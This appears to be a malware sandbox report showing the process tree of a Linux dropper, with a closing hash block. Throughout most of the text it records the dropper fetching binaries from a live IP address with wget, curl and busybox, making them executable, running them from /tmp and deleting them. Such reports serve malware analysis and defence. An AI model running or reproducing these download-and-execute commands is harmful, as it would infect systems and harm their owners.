/bin/chmodchmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:949
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:950
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:952
-
-
/bin/chmodchmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:955
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:956
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:958
-
-
/bin/chmodchmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:961
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:962
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:964
-
-
/bin/chmodchmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:967
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:968
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:970
-
-
/bin/chmodchmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:973
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:974
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:976
-
-
/bin/chmodchmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:979
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:980
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:982
-
-
/bin/chmodchmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:985
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:986
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:988
-
-
/bin/chmodchmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:991
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97